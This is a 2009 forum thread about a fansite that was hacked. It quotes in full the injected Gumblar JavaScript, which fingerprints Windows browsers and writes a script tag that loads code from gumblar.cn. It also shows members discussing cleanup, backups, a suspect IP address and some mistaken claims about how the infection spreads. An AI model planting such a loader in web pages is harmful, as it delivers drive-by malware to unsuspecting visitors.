var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=\"http://gumblar.cn/rss/?id=%22+j+%22\"><\/script>");}
}


What does that code do + how could someone have put that in..

Who coded it Ross?

GoldenMerc
07-05-2009, 10:59 PM
It attempts to contact:
"http://gumblar.cn/rss/" (don't visit it folks, it's a bad website)

With your browser & OS info if I'm not mistaken. Opens up to this:



var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=\"http://gumblar.cn/rss/?id=%22+j+%22\"><\/script>");}
}

What would that do?

Jin
07-05-2009, 11:04 PM
Who knows what the site's agenda is, but some information from internet giant Google on the site is located here (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://gumblar.cn/rss/).

Favourtism
07-05-2009, 11:08 PM
raw ftp logs have found an IP that is from Chelmsford

investigating

HotelUser
07-05-2009, 11:23 PM
Because of this incident we are now re-building the rare value system, as well as making sure the forum wasn't touched, and other various scripts on HHGS.

Favourtism
07-05-2009, 11:35 PM
Additionally Ross is contacting the ISP and police for information and to investigate it further.

J0SH
07-05-2009, 11:39 PM
Contacted police? LOL "Hello someone coded a values system for my Habbo fansite and I think they put a trojan on it." get a grip, police will tell you to **** off, it isn't even an emergency or a witness statement etc, what a waste of police's time.

Are you the guy by any chance who rang 999 to say there's no sprite in McDonalds?

Favourtism
07-05-2009, 11:48 PM
Contacted police? LOL "Hello someone coded a values system for my Habbo fansite and I think they put a trojan on it." get a grip, police will tell you to **** off, it isn't even an emergency or a witness statement etc, what a waste of police's time.

Are you the guy by any chance who rang 999 to say there's no sprite in McDonalds?

(S)He gained unauthorised access to hhgs and edited loads of files with malicious code...

Jaysun
07-05-2009, 11:49 PM
Close HHGS. You could do something better on the web in my opinion.

Favourtism
07-05-2009, 11:52 PM
Close HHGS. You could do something better on the web in my opinion.

You haven't seen the new forum's features ;)

Blinger1
08-05-2009, 01:45 AM
Additionally Ross is contacting the ISP and police for information and to investigate it further.
http://brian-moffatt.com/images/internetpolice.jpg


But seriously, I love how at the start of this thread it's like "its not a trojan!11111!!!" and now that Jin and Jew have posted it is now like "okay, there could be malicious code..."

Favourtism
08-05-2009, 03:09 AM
We've seen that files were edited on May 4th so are restoring to a previous backup.

Jin
08-05-2009, 05:51 AM
(S)He gained unauthorised access to hhgs and edited loads of files with malicious code...

Yeah, still the police wouldn't do anything, it would need to be a serious crime on the internetz before the police bother to get involved. An insecure website with a line of malicious code to install a trojan isn't exactly worth their time and effort.

Excellent2
08-05-2009, 09:33 AM
Not good. I would advise putting the site on maintenance and getting a decent coder to check your files.

J0SH
08-05-2009, 09:54 AM
(S)He gained unauthorised access to hhgs and edited loads of files with malicious code...

What does that have to do with anything, it's a Habbo fansite and he's probably only like 17 ;) ;) so they won't do anything.

Zak
08-05-2009, 11:35 AM
You haven't seen the new forum's features ;)

rofl nice reply xD

Kieeran
08-05-2009, 12:06 PM
K in the simplest way possible, I've been on hhgs.net on values, am I infected with a trojan?

Invent
08-05-2009, 01:17 PM
K in the simplest way possible, I've been on hhgs.net on values, am I infected with a trojan?

No, you are not.

Jahova
08-05-2009, 03:17 PM
Some people are so paranoid. It uses a JS redirector to a site containing a trojan. If you have a good firewall, which you all seem to have, then you are fine. As you can see it's blocked you from viewing the site, therefore nothing to worry about. Calm down.

GoldenMerc
08-05-2009, 06:56 PM
It should all be gone now, Thanks to Hostgator, HotelUser, Favourtism.
The IP that did it is;
77.96.228.62
I really don't know what to do about it, some people are saying it may be from the Conficker worm but I highly doubt it.
Anyways any more problems direct them to [email protected]
I'm sorry for saying you lied;
@Jake - But you normally do...
*REMOVED*
@Jin - sexy chocolate
@Jewish bear - fnx for decrypting some codes for me last night.

Edit by Robbie! (Forum Super Moderator): Please do not accuse other members of hacking

iDenning
08-05-2009, 09:56 PM
good luck finding out who did it, go get them homie.

maiden2k7
09-05-2009, 12:12 AM
It's not one person who did it, this is a very very smart virus, it starts off as a trojan, it then writes the code to the JS file of its choice and once uploaded people will start seeing the trojan attack in their antivirus.

Problem is with this, once it has infected one it will infect more, so I advise you to check all JS files on your server as it will get worse if you don't.

One of our clients had this at work, it was quite bad and took down my boss' PC, it got him because he downloaded the client's site files though.

Cheers
Matt

Agnostic Bear
09-05-2009, 10:40 AM
It's not one person who did it, this is a very very smart virus, it starts off as a trojan, it then writes the code to the JS file of its choice and once uploaded people will start seeing the trojan attack in their antivirus.

Problem is with this, once it has infected one it will infect more, so I advise you to check all JS files on your server as it will get worse if you don't.

One of our clients had this at work, it was quite bad and took down my boss' PC, it got him because he downloaded the client's site files though.

Cheers
Matt

If you think this is a smart virus I'd love to see what you think of conficker, also this thing does absolutely nothing you say it does.

Meti
09-05-2009, 06:18 PM
Stop trying to look at their javascript codes. They'll get mad and of course they'll give you a trojan horse.
Nah, jokes :P Just so stupid to try giving other people viruses.

kickerbat
08-06-2012, 05:58 AM
GoldenMerc thinks he's top stuff, hhgs was a fail.

Edited by Jordan (Forum Super Moderator): Please do not bump old threads

Kasabian
08-06-2012, 10:22 AM
GoldenMerc thinks he's top stuff, hhgs was a fail.

Nice grave dig pal.
